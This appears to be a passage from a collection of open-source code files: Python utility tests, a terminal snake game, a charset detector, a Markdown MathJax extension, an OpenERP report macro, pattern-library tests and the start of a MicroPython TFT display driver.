grep foo
''')
            fp.close()
            os.chmod(tmpfilename, 0o755)
            try:
                utils.execute(tmpfilename,
                              tmpfilename2,
                              process_input=b'foo',
                              attempts=2)
            except OSError as e:
                if e.errno == errno.EACCES:
                    self.skipTest("Permissions error detected. "
                                  "Are you running with a noexec /tmp?")
                else:
                    raise
        finally:
            os.unlink(tmpfilename)
            os.unlink(tmpfilename2)

    @mock.patch.object(processutils, 'execute')
    @mock.patch.object(os.environ, 'copy', return_value={})
    def test_execute_use_standard_locale_no_env_variables(self, env_mock,
                                                          execute_mock):
        """use_standard_locale=True injects LC_ALL=C."""
        utils.execute('foo', use_standard_locale=True)
        execute_mock.assert_called_once_with('foo',
                                             env_variables={'LC_ALL': 'C'})

    @mock.patch.object(processutils, 'execute')
    def test_execute_use_standard_locale_with_env_variables(self,
                                                            execute_mock):
        """LC_ALL=C is merged with caller-supplied env_variables."""
        utils.execute('foo', use_standard_locale=True,
                      env_variables={'foo': 'bar'})
        execute_mock.assert_called_once_with('foo',
                                             env_variables={'LC_ALL': 'C',
                                                            'foo': 'bar'})

    @mock.patch.object(processutils, 'execute')
    def test_execute_not_use_standard_locale(self, execute_mock):
        """Without use_standard_locale the env_variables pass through as-is."""
        utils.execute('foo', use_standard_locale=False,
                      env_variables={'foo': 'bar'})
        execute_mock.assert_called_once_with('foo',
                                             env_variables={'foo': 'bar'})

    def test_execute_get_root_helper(self):
        """run_as_root=True adds the configured root helper."""
        with mock.patch.object(processutils, 'execute') as execute_mock:
            helper = utils._get_root_helper()
            utils.execute('foo', run_as_root=True)
            execute_mock.assert_called_once_with('foo', run_as_root=True,
                                                 root_helper=helper)

    def test_execute_without_root_helper(self):
        """run_as_root=False omits the root helper."""
        with mock.patch.object(processutils, 'execute') as execute_mock:
            utils.execute('foo', run_as_root=False)
            execute_mock.assert_called_once_with('foo', run_as_root=False)

    def test_validate_and_normalize_mac(self):
        """A valid MAC address is returned lower-cased."""
        mac = 'AA:BB:CC:DD:EE:FF'
        with mock.patch.object(netutils, 'is_valid_mac') as m_mock:
            m_mock.return_value = True
            self.assertEqual(mac.lower(),
                             utils.validate_and_normalize_mac(mac))

    def test_validate_and_normalize_mac_invalid_format(self):
        """An invalid MAC address raises InvalidMAC."""
        with mock.patch.object(netutils, 'is_valid_mac') as m_mock:
            m_mock.return_value = False
            self.assertRaises(exception.InvalidMAC,
                              utils.validate_and_normalize_mac, 'invalid-mac')

    def test_safe_rstrip(self):
        """safe_rstrip() strips only trailing characters, never everything."""
        value = '/test/'
        rstripped_value = '/test'
        not_rstripped = '/'

        self.assertEqual(rstripped_value, utils.safe_rstrip(value, '/'))
        self.assertEqual(not_rstripped, utils.safe_rstrip(not_rstripped, '/'))

    def test_safe_rstrip_not_raises_exceptions(self):
        # Supplying an integer would normally raise an exception because it
        # does not have the rstrip() method.
        value = 10
        # In the case of raising an exception safe_rstrip() should return the
        # original value.
        self.assertEqual(value, utils.safe_rstrip(value))
class TempFilesTestCase(base.TestCase):
    """Tests for the utils.tempdir() context manager."""

    def test_tempdir(self):
        """The directory exists inside the context and is removed afterwards."""
        dirname = None
        with utils.tempdir() as tempdir:
            self.assertTrue(os.path.isdir(tempdir))
            dirname = tempdir
        self.assertFalse(os.path.exists(dirname))

    @mock.patch.object(shutil, 'rmtree')
    @mock.patch.object(tempfile, 'mkdtemp')
    def test_tempdir_mocked(self, mkdtemp_mock, rmtree_mock):
        """kwargs are forwarded to mkdtemp() and the directory is rmtree'd."""
        self.config(tempdir='abc')
        mkdtemp_mock.return_value = 'temp-dir'
        kwargs = {'a': 'b'}
        with utils.tempdir(**kwargs) as tempdir:
            self.assertEqual('temp-dir', tempdir)
            tempdir_created = tempdir
        mkdtemp_mock.assert_called_once_with(**kwargs)
        rmtree_mock.assert_called_once_with(tempdir_created)

    @mock.patch.object(utils, 'LOG')
    @mock.patch.object(shutil, 'rmtree')
    @mock.patch.object(tempfile, 'mkdtemp')
    def test_tempdir_mocked_error_on_rmtree(self, mkdtemp_mock, rmtree_mock,
                                            log_mock):
        """A failing cleanup is logged instead of being raised."""
        self.config(tempdir='abc')
        mkdtemp_mock.return_value = 'temp-dir'
        rmtree_mock.side_effect = OSError
        with utils.tempdir() as tempdir:
            self.assertEqual('temp-dir', tempdir)
            tempdir_created = tempdir
        rmtree_mock.assert_called_once_with(tempdir_created)
        self.assertTrue(log_mock.error.called)
class GeneratePasswordTestCase(base.TestCase):
    """Tests for utils.generate_password()."""

    def test_generate_password(self):
        """A generated password contains at least one digit, one lowercase
        and one uppercase letter."""
        password = utils.generate_password(length=12)
        # any() expresses "at least one" directly and short-circuits instead
        # of materialising a throwaway list of matching characters.
        self.assertTrue(any(c in '0123456789' for c in password))
        self.assertTrue(any(c in 'abcdefghijklmnopqrstuvwxyz'
                            for c in password))
        self.assertTrue(any(c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
                            for c in password))
| apache-2.0 |
5paceManSpiff/CLSnake | src/main.py | 1 | 2890 | #!/usr/bin/env python3
import curwrap
import curses
import snake
import time
import os
import sys
# initializes the curses standard screen (module-level so every helper in
# this script shares the same screen object)
stdscr = curses.initscr()
def restart_snake():
    """Restart CLSnake by replacing the current process with a fresh one."""
    # leave curses mode first so the terminal is sane for the new process
    curwrap.endC(stdscr)
    # re-exec the same interpreter with the original argument vector;
    # os.execl never returns
    interpreter = sys.executable
    os.execl(interpreter, interpreter, *sys.argv)
def main():
    """Contains the main loop and game logic."""
    # holds score
    score = 0
    # holds dimensions of terminal window
    y, x = stdscr.getmaxyx()
    # defines the main, stats, and board windows
    # NOTE: the local name ``main`` shadows this function inside its own body
    main = curses.newwin(y-1, x, 0, 0)
    stat = curses.newwin(1, x, y-1, 1)
    board = curses.newwin(y-3, x-3, 1, 1)
    # holds dimensions for the board window
    boardy, boardx = board.getmaxyx()
    # sets s as the "Snake" object from the snake module
    s = snake.Snake(board)
    # sets the direction that the snake initially moves in
    facing = 'r'
    # prevents curses from waiting for character inputs
    stdscr.nodelay(1)
    # initializes first food object
    foo = snake.Food(10, 10, y - 3, boardx, board)
    grow = False
    # main loop
    while True:
        # increases (arbitrary) game speed based on score
        if score == 0:
            time.sleep(.1)
        else:
            time.sleep(.05 / score * 2)
        # adds score if player eats food
        if s.parts[0].x == foo.x and s.parts[0].y == foo.y:
            score += 1
            foo.new()
            grow = True
        # draws the reverse-video border around the playing field
        for i in range(y-1): #left
            main.addstr(i, 0, ' ', curses.A_REVERSE)
        for i in range(y-1): #right
            main.addstr(i, x-2, ' ', curses.A_REVERSE)
        for i in range(x-1): #top
            main.addstr(0, i, ' ', curses.A_REVERSE)
        for i in range(x-1): #bottom
            main.addstr(y-2, i, ' ', curses.A_REVERSE)
        # displays score
        stat.addstr(0, 0, 'Score : ' + str(score))
        # gets pressed character (non-blocking, may be -1)
        c = stdscr.getch()
        # assigns wasd keys to directions
        if c == ord('s'):
            direction = 'd'
        elif c == ord('w'):
            direction = 'u'
        elif c == ord('d'):
            direction = 'r'
        elif c == ord('a'):
            direction = 'l'
        else:
            direction = None
        # quits on press of "q" key
        if c == ord('q'):
            break
        # displays food
        foo.display()
        # moves snake based off of direction facing and new direction
        facing = s.move(facing, direction)
        # deletes leftover snake parts if not growing
        if not grow:
            s.delete()
        else:
            grow = False
        # restarts the whole game when the head crosses the world boundaries
        if s.parts[0].x == -1 or s.parts[0].x == boardx or s.parts[0].y == -1 or s.parts[0].y == boardy:
            restart_snake()
        else:
            s.display()
        # refreshes all displays
        main.refresh()
        stat.refresh()
        board.refresh()
    # resets to normal character delay once the loop is left via "q"
    stdscr.nodelay(0)
# attempts to initialize curses, then start main loop
# if an error occurs, it exits curses as to prevent the terminal from flipping out
try:
    curwrap.startC(stdscr)
    main()
    curwrap.endC(stdscr)
except:
    # always restore the terminal before propagating the error
    curwrap.endC(stdscr)
    raise
prashanthr/wakatime | wakatime/packages/requests/packages/chardet/mbcharsetprober.py | 2924 | 3268 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
    """Base class for multi-byte charset probers.

    Subclasses supply a coding state machine (``_mCodingSM``) and a character
    distribution analyzer (``_mDistributionAnalyzer``) for their encoding.
    """

    def __init__(self):
        CharSetProber.__init__(self)
        self._mDistributionAnalyzer = None
        self._mCodingSM = None
        # last two bytes seen, carried across feed() calls so multi-byte
        # characters split over buffer boundaries are still analyzed
        self._mLastChar = [0, 0]

    def reset(self):
        """Reset the prober (and its SM/analyzer, if already set)."""
        CharSetProber.reset(self)
        if self._mCodingSM:
            self._mCodingSM.reset()
        if self._mDistributionAnalyzer:
            self._mDistributionAnalyzer.reset()
        self._mLastChar = [0, 0]

    def get_charset_name(self):
        # abstract: concrete probers return their charset name
        pass

    def feed(self, aBuf):
        """Consume a byte buffer and return the resulting prober state."""
        aLen = len(aBuf)
        for i in range(0, aLen):
            codingState = self._mCodingSM.next_state(aBuf[i])
            if codingState == constants.eError:
                if constants._debug:
                    sys.stderr.write(self.get_charset_name()
                                     + ' prober hit error at byte ' + str(i)
                                     + '\n')
                self._mState = constants.eNotMe
                break
            elif codingState == constants.eItsMe:
                self._mState = constants.eFoundIt
                break
            elif codingState == constants.eStart:
                # a complete character was recognized; feed it to the analyzer
                charLen = self._mCodingSM.get_current_charlen()
                if i == 0:
                    self._mLastChar[1] = aBuf[0]
                    self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
                else:
                    self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
                                                     charLen)

        self._mLastChar[0] = aBuf[aLen - 1]

        if self.get_state() == constants.eDetecting:
            # shortcut: declare success once confidence is high enough
            if (self._mDistributionAnalyzer.got_enough_data() and
                    (self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
                self._mState = constants.eFoundIt

        return self.get_state()

    def get_confidence(self):
        return self._mDistributionAnalyzer.get_confidence()
| bsd-3-clause |
zestedesavoir/Python-ZMarkdown | zmarkdown/extensions/mathjax.py | 1 | 1701 | import zmarkdown
from zmarkdown import inlinepatterns, util, Extension
from zmarkdown.blockprocessors import BlockProcessor
import re
class MathJaxPattern(inlinepatterns.Pattern):
    """Inline pattern matching $...$ math (unescaped dollar delimiters)."""

    def __init__(self):
        # dollars preceded by a backslash are treated as literal text
        math_re = r'(?<!\\)\$([^\n]+?)(?<!\\)\$'
        inlinepatterns.Pattern.__init__(self, math_re)

    def handleMatch(self, m):
        # wrap the math (delimiters included) in a span, protected from
        # further inline processing by AtomicString
        element = util.etree.Element('span')
        element.text = util.AtomicString("$" + m.group(2) + "$")
        return element
class MathJaxBlock(BlockProcessor):
    """Block processor that wraps $$...$$ display math in a mathjax element."""

    def __init__(self, parser):
        BlockProcessor.__init__(self, parser)
        self.re = re.compile(r'(?:^|\n)\$\$.+\$\$(\n|$)', re.DOTALL | re.MULTILINE | re.UNICODE)

    def test(self, parent, block):
        return self.re.search(block)

    def run(self, parent, blocks):
        block = blocks.pop(0)
        match = self.re.search(block)
        # split into the text before the math, the math itself, and the rest
        before = block[:match.start()]
        math = block[match.start():match.end()]
        after = block[match.end():]
        if before:
            self.parser.parseBlocks(parent, [before])
        wrapper = util.etree.SubElement(parent, 'div')
        wrapper.set('class', "mathjax-wrapper")
        element = zmarkdown.util.etree.SubElement(wrapper, "mathjax")
        element.text = zmarkdown.util.AtomicString(math.strip())
        if after:
            # push the remainder back so it is processed next
            blocks.insert(0, after)
class MathJaxExtension(Extension):
    """Registers the inline and block MathJax processors with zmarkdown."""

    def extendZMarkdown(self, md, md_globals):
        inline_pattern = MathJaxPattern()
        block_processor = MathJaxBlock(md.parser)
        # must be registered before escape matching because \ is pretty
        # important in LaTeX
        md.inlinePatterns.add('mathjax', inline_pattern, '<escape')
        md.parser.blockprocessors.add('mathjax', block_processor, '>reference')
def makeExtension(*args, **kwargs):
    """Entry point used by zmarkdown to construct the extension."""
    extension = MathJaxExtension(*args, **kwargs)
    return extension
| bsd-3-clause |
datenbetrieb/odoo | addons/base_report_designer/plugin/openerp_report_designer/bin/script/modify.py | 384 | 4437 | #########################################################################
#
# Copyright (c) 2003-2004 Danny Brewer d29583@groovegarden.com
# Copyright (C) 2004-2010 OpenERP SA (<http://openerp.com>).
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# See: http://www.gnu.org/licenses/lgpl.html
#
#############################################################################
import re
import uno
import string
import unohelper
import xmlrpclib
from com.sun.star.task import XJobExecutor
# When not bundled as an extension package, pull the helper modules in
# directly. NOTE: this file targets Python 2 (``<>`` is the Py2 "!=").
if __name__<>"package":
    from lib.gui import *
    from Expression import Expression
    from Fields import Fields
    from Repeatln import RepeatIn
    from lib.error import *

# default connection parameters used during development
database="test"
uid = 3
class modify(unohelper.Base, XJobExecutor ):
    """OpenOffice job that lets the user edit the report placeholder under
    the view cursor.

    Depending on the kind of placeholder found ([[ field ]],
    [[ expression ]] or [[ repeatIn(...) ]]) the matching edit dialog
    (Fields, Expression or RepeatIn) is opened in modify mode.
    """
    def __init__(self, ctx):
        self.ctx = ctx
        self.module = "openerp_report"
        self.version = "0.1"
        # Variable Declaration
        desktop = getDesktop()
        doc = desktop.getCurrentComponent()
        docinfo = doc.getDocumentInfo()
        self.oVC = doc.CurrentController.getViewCursor()
        # user-defined Field-1 of the document must hold the server URL
        if not docinfo.getUserFieldValue(0)=="":
            self.sMyHost= docinfo.getUserFieldValue(0)
        else:
            ErrorDialog(
                "Please insert user define field Field-1",
                "Just go to File->Properties->User Define \n"
                "Field-1 E.g. http://localhost:8069"
            )
            exit(1)
        # Check whether Field-4 is available, otherwise exit from application
        if not docinfo.getUserFieldValue(3) == "" and not docinfo.getUserFieldValue(0)=="":
            if self.oVC.TextField:
                self.oCurObj=self.oVC.TextField
                item = self.oCurObj.Items[0]
                kind, group1, group2 = self.getOperation(self.oCurObj.Items[1] )
                # split "table.path.to.field" into the table name and a
                # slash-separated attribute path
                start_group1 = group1[:group1.find(".")]
                stop_group1 = group1[group1.find("."):].replace(".", "/")
                if kind == "field":
                    Fields( start_group1, stop_group1, item, True )
                elif kind == "expression":
                    Expression( group1, item, True )
                elif kind == "repeatIn":
                    RepeatIn( start_group1, group2, stop_group1, item, True )
            else:
                ErrorDialog(
                    "Please place your cursor at beginning of field that you want to modify.",""
                )
        else:
            ErrorDialog(
                "Please insert user define field Field-1 or Field-4",
                "Just go to File->Properties->User Define \n"
                "Field-1 E.g. http://localhost:8069 \n"
                "OR \n"
                "Field-4 E.g. account.invoice"
            )
            exit(1)

    def getOperation(self, str):
        """Classify a placeholder string; returns (kind, group1, group2).

        NOTE: the parameter name shadows the builtin ``str``; kept for
        interface compatibility. Returns None when nothing matches.
        """
        #str = "[[ RepeatIn(objects, 'variable') ]]" #repeatIn
        #str = "[[ saleorder.partner_id.name ]]" # field
        #str = "[[ some thing complex ]]" # expression
        method1 = lambda x: (u'repeatIn', x.group(1), x.group(2))
        method2 = lambda x: (u'field', x.group(1), None)
        method3 = lambda x: (u'expression', x.group(1), None)
        # first matching rule wins; rules are ordered from most to least
        # specific
        regexes = [
            ('\\[\\[ *repeatIn\\( *(.+)*, *\'([a-zA-Z0-9_]+)\' *\\) *\\]\\]', method1),
            ('\\[\\[ *([a-zA-Z0-9_\.]+) *\\]\\]', method2),
            ('\\[\\[ *(.+) *\\]\\]', method3)
        ]
        for (rule,method) in regexes:
            res = re.match(rule, str)
            if res:
                return method(res)
# Run immediately when loaded as a macro script; otherwise register the
# implementation with the UNO component framework.
if __name__<>"package":
    modify(None)
else:
    g_ImplementationHelper.addImplementation( modify, "org.openoffice.openerp.report.modify", ("com.sun.star.task.Job",),)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
milki/morph | morph/tests/test_pattern.py | 1 | 4480 | # test_pattern.py -- Tests for Pattern
"""Tests for Pattern objects"""
from morph import (
pattern
)
from morph.pattern import (
LiteralPattern,
NumericCounterPattern,
)
from morph.errors import (
PatternModeError
)
from morph.tests import TestCase
class PatternTestCase(TestCase):
    """Tests for pattern.generatePattern()."""

    def gen(self, pat, mode = pattern.MODE_APPEND):
        """Shorthand around pattern.generatePattern()."""
        return pattern.generatePattern(pat, mode)

    def testGenerate(self):
        """generatePattern() returns the right subclass with the right mode."""
        literal_default = self.gen('abc')
        self.assertTrue(isinstance(literal_default, LiteralPattern))
        self.assertEqual(LiteralPattern('abc'), literal_default)

        literal_replace = self.gen('abc', mode = pattern.MODE_REPLACE)
        self.assertTrue(isinstance(literal_replace, LiteralPattern))
        self.assertEqual(LiteralPattern('abc', mode = pattern.MODE_REPLACE),
                         literal_replace)

        counter_default = self.gen('###')
        self.assertTrue(isinstance(counter_default, NumericCounterPattern))
        self.assertEqual(NumericCounterPattern(1, 3), counter_default)

        counter_replace = self.gen('###', mode = pattern.MODE_REPLACE)
        self.assertTrue(isinstance(counter_replace, NumericCounterPattern))
        self.assertEqual(
            NumericCounterPattern(1, 3, mode = pattern.MODE_REPLACE),
            counter_replace)
class LiteralPatternTestCase(TestCase):
    """Tests for LiteralPattern in append/replace/insert modes."""

    def testApply(self):
        """apply_to_string() appends, replaces or inserts the literal text."""
        append_pattern = LiteralPattern('abc')
        self.assertEqual('fileabc',
                         append_pattern.apply_to_string('file', 'file', 0))

        replace_pattern = LiteralPattern('abc', pattern.MODE_REPLACE)
        self.assertEqual('abc',
                         replace_pattern.apply_to_string('file', 'file', 0))

        insert_pattern = LiteralPattern('abc', pattern.MODE_INSERT, 1)
        self.assertEqual('fabcile',
                         insert_pattern.apply_to_string('file', 'file', 0))

    def testStr(self):
        """str() shows the mode, optional position and literal text."""
        append_pattern = LiteralPattern('abc')
        self.assertEqual('Literal (append, abc)', str(append_pattern))

        replace_pattern = LiteralPattern('abc', pattern.MODE_REPLACE)
        self.assertEqual('Literal (replace, abc)', str(replace_pattern))

        insert_pattern = LiteralPattern('abc', pattern.MODE_INSERT, 1)
        self.assertEqual('Literal (insert, 1, abc)', str(insert_pattern))
class NumericCounterPatternTestCase(TestCase):
    """Tests for NumericCounterPattern in all three modes."""

    def testApply(self):
        """The counter increments on every apply and is zero-padded."""
        appendPat = NumericCounterPattern()
        self.assertEqual('file01',
                         appendPat.apply_to_string('file', 'file', 0))
        self.assertEqual('file02',
                         appendPat.apply_to_string('file', 'file', 0))

        # custom start value (50) and width (3)
        appendPat1 = NumericCounterPattern(50, 3)
        self.assertEqual('file050',
                         appendPat1.apply_to_string('file', 'file', 0))
        self.assertEqual('file051',
                         appendPat1.apply_to_string('file', 'file', 0))

        replacePat = NumericCounterPattern(mode=pattern.MODE_REPLACE)
        self.assertEqual('01',
                         replacePat.apply_to_string('file', 'file', 0))
        self.assertEqual('02',
                         replacePat.apply_to_string('file', 'file', 0))

        insertPat = NumericCounterPattern(mode = pattern.MODE_INSERT,
                                          position=1)
        self.assertEqual('f01ile',
                         insertPat.apply_to_string('file', 'file', 0))
        self.assertEqual('f02ile',
                         insertPat.apply_to_string('file', 'file', 0))

    def testReset(self):
        """reset() restarts the counter from its initial value."""
        replacePat = NumericCounterPattern(mode=pattern.MODE_REPLACE)
        self.assertEqual('01',
                         replacePat.apply_to_string('file', 'file', 0))
        self.assertEqual('02',
                         replacePat.apply_to_string('file', 'file', 0))
        replacePat.reset()
        self.assertEqual('01',
                         replacePat.apply_to_string('file', 'file', 0))
        self.assertEqual('02',
                         replacePat.apply_to_string('file', 'file', 0))

    def testStr(self):
        """str() includes the mode and the counter parameters."""
        appendPat = NumericCounterPattern()
        self.assertEqual('NumericCounter (append, 1, 1, 2)', str(appendPat))

        replacePat = NumericCounterPattern(mode=pattern.MODE_REPLACE)
        self.assertEqual('NumericCounter (replace, 1, 1, 2)', str(replacePat))

        insertPat = NumericCounterPattern(mode=pattern.MODE_INSERT,
                                          position=1)
        self.assertEqual('NumericCounter (insert, 1, 1, 1, 2)', str(insertPat))
| bsd-2-clause |
peterhinch/micropython-tft-gui | tft/driver/tft.py | 1 | 32591 | #
# The MIT License (MIT)
#
# Copyright (c) 2016 Robert Hammelrath
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Some parts of the software are a port of code provided by Rinky-Dink Electronics, Henning Karlsen,
# with the following copyright notice:
#
## Copyright (C)2015 Rinky-Dink Electronics, Henning Karlsen. All right reserved
## This library is free software; you can redistribute it and/or
## modify it under the terms of the CC BY-NC-SA 3.0 license.
## Please see the included documents for further information.
#
# Class supporting TFT LC-displays with a parallel Interface
# First example: Controller SSD1963 with a 4.3" or 7" display
#
# The minimal connection is:
# X1..X8 for data, Y9 for /Reset, Y10 for /RD, Y11 for /WR and Y12 for /RS
# Then LED must be hard tied to Vcc and /CS to GND.
#
import pyb, stm
from uctypes import addressof
from tft.driver import TFT_io
import gc
# define constants
#
# control-line bit masks for the parallel bus (pin names in the ## comments)
RESET = const(1 << 10)  ## Y9
RD = const(1 << 11)  ## Y10
WR = const(0x01)  ## Y11
D_C = const(0x02)  ## Y12

LED = const(1 << 8)  ## Y3
POWER = const(1 << 9)  ## Y4
## CS is not used and must be hard tied to GND

# display orientation selectors
PORTRAIT = const(1)
LANDSCAPE = const(0)
class TFT:
def __init__(self, controller = "SSD1963", lcd_type = "LB04301", orientation = LANDSCAPE,
v_flip = False, h_flip = False, power_control = True):
self.tft_init(controller, lcd_type, orientation, v_flip, h_flip)
    def tft_init(self, controller = "SSD1963", lcd_type = "LB04301", orientation = LANDSCAPE,
                 v_flip = False, h_flip = False, power_control = True):
        """Hardware initialization of the display.

        Configures the data/control GPIOs, hard-resets the panel, programs
        the SSD1963 controller for the selected LCD panel and sets the
        drawing defaults (colors, text style, scroll area).

        controller    -- controller chip name; only "SSD1963" is supported
        lcd_type      -- "LB04301" (480x272) or "AT070TN92" (800x480)
        orientation   -- LANDSCAPE or PORTRAIT
        v_flip/h_flip -- mirror the image vertically / horizontally
        power_control -- when True, pin Y4 is used to switch panel power
        """
        #
        # For convenience, define X1..X8 and Y9..Y12 as output ports using the
        # pyb.Pin functions. X1..X8 will be redefined on the fly as input by
        # accessing the MODER control registers when needed. Y9 is treated
        # separately, since it is used for Reset, which is done at python level
        # since it needs long delays anyhow, 5 and 15 ms vs. 10 µs.
        #
        # Set TFT general defaults
        self.controller = controller
        self.lcd_type = lcd_type
        self.orientation = orientation
        self.v_flip = v_flip # flip vertical
        self.h_flip = h_flip # flip horizontal
        self.c_flip = 0 # flip blue/red
        self.rc_flip = 0 # flip row/column
        self.setColor((255, 255, 255)) # set FG color to white as can be.
        self.setBGColor((0, 0, 0))     # set BG to black
        self.bg_buf = bytearray()
        #
        self.pin_led = None # deferred init Flag
        self.power_control = power_control
        if self.power_control:
            # special treat for Power Pin
            self.pin_power = pyb.Pin("Y4", pyb.Pin.OUT_PP)
            self.power(True) ## switch Power on
        #
        pyb.delay(10)
        # this may have to be moved to the controller specific section
        if orientation == PORTRAIT:
            self.setXY = TFT_io.setXY_P
            self.drawPixel = TFT_io.drawPixel_P
        else:
            self.setXY = TFT_io.setXY_L
            self.drawPixel = TFT_io.drawPixel_L
        self.swapbytes = TFT_io.swapbytes
        self.swapcolors = TFT_io.swapcolors
        # ----------
        for pin_name in ["X1", "X2", "X3", "X4", "X5", "X6", "X7", "X8",
                   "Y10", "Y11", "Y12"]:
            pin = pyb.Pin(pin_name, pyb.Pin.OUT_PP) # set as output
            pin.value(1)  ## set high as default
        # special treat for Reset
        self.pin_reset = pyb.Pin("Y9", pyb.Pin.OUT_PP)
        # Reset the device
        self.pin_reset.value(1)  ## do a hard reset
        pyb.delay(10)
        self.pin_reset.value(0)  ## Low
        pyb.delay(20)
        self.pin_reset.value(1)  ## set high again
        pyb.delay(20)
        #
        # Now initialiize the LCD
        # This is for the SSD1963 controller and two specific LCDs. More may follow.
        # Data taken from the SSD1963 data sheet, SSD1963 Application Note and the LCD Data sheets
        #
        if controller == "SSD1963":           # 1st approach for 480 x 272
            TFT_io.tft_cmd_data(0xe2, bytearray(b'\x1d\x02\x54'), 3) # PLL multiplier, set PLL clock to 100M
                                              # N=0x2D for 6.5MHz, 0x1D for 10MHz crystal
                                              # PLLClock = Crystal * (Mult + 1) / (Div + 1)
                                              # The intermediate value Crystal * (Mult + 1) must be between 250MHz and 750 MHz
            TFT_io.tft_cmd_data(0xe0, bytearray(b'\x01'), 1) # PLL Enable
            pyb.delay(10)
            TFT_io.tft_cmd_data(0xe0, bytearray(b'\x03'), 1)
            pyb.delay(10)
            TFT_io.tft_cmd(0x01)                     # software reset
            pyb.delay(10)
            #
            # Settings for the LCD
            #
            # The LCDC_FPR depends on PLL clock and the reccomended LCD Dot clock DCLK
            #
            # LCDC_FPR = (DCLK * 1048576 / PLLClock) - 1
            #
            # The other settings are less obvious, since the definitions of the SSD1963 data sheet and the
            # LCD data sheets differ. So what' common, even if the names may differ:
            # HDP  Horizontal Panel width (also called HDISP, Thd). The value store in the register is HDP - 1
            # VDP  Vertical Panel Width (also called VDISP, Tvd). The value stored in the register is VDP - 1
            # HT   Total Horizontal Period, also called HP, th... The exact value does not matter
            # VT   Total Vertical Period, alco called VT, tv, .. The exact value does not matter
            # HPW  Width of the Horizontal sync pulse, also called HS, thpw.
            # VPW  Width of the Vertical sync pulse, also called VS, tvpw
            # Front Porch (HFP and VFP) Time between the end of display data and the sync pulse
            # Back Porch (HBP  and VBP Time between the start of the sync pulse and the start of display data.
            #      HT = FP + HDP + BP and VT = VFP + VDP + VBP (sometimes plus sync pulse width)
            # Unfortunately, the controller does not use these front/back porch times, instead it uses an starting time
            # in the front porch area and defines (see also figures in chapter 13.3 of the SSD1963 data sheet)
            # HPS  Time from that horiz. starting point to the start of the horzontal display area
            # LPS  Time from that horiz. starting point to the horizontal sync pulse
            # VPS  Time from the vert. starting point to the first line
            # FPS  Time from the vert. starting point to the vertical sync pulse
            #
            # So the following relations must be held:
            #
            # HT >  HDP + HPS
            # HPS >= HPW + LPS
            # HPS = Back Porch - LPS, or HPS = Horizontal back Porch
            # VT > VDP + VPS
            # VPS >= VPW + FPS
            # VPS = Back Porch - FPS, or VPS = Vertical back Porch
            #
            # LPS or FPS may have a value of zero, since the length of the front porch is detemined by the
            # other figures
            #
            # The best is to start with the recomendations of the lCD data sheet for Back porch, grab a
            # sync pulse with and the determine the other, such that they meet the relations. Typically, these
            # values allow for some ambuigity.
            #
            if lcd_type == "LB04301":  # Size 480x272, 4.3", 24 Bit, 4.3"
                #
                # Value            Min    Typical   Max
                # DotClock        5 MHZ    9 MHz    12 MHz
                # HT (Hor. Total   490     531      612
                # HDP (Hor. Disp)          480
                # HBP (back porch)  8      43
                # HFP (Fr. porch)   2       8
                # HPW (Hor. sync)   1
                # VT (Vert. Total) 275     288      335
                # VDP (Vert. Disp)         272
                # VBP (back porch)  2      12
                # VFP (fr. porch)   1       4
                # VPW (vert. sync)  1      10
                #
                # This table in combination with the relation above leads to the settings:
                # HPS = 43, HPW = 8, LPS = 0, HT = 531
                # VPS = 14, VPW = 10, FPS = 0, VT = 288
                #
                self.disp_x_size = 479
                self.disp_y_size = 271
                TFT_io.tft_cmd_data_AS(0xe6, bytearray(b'\x01\x70\xa3'), 3) # PLL setting for PCLK
                    # (9MHz * 1048576 / 100MHz) - 1 = 94371 = 0x170a3
                TFT_io.tft_cmd_data_AS(0xb0, bytearray(  # # LCD SPECIFICATION
                    [0x20,                # 24 Color bits, HSync/VSync low, No Dithering
                     0x00,                # TFT mode
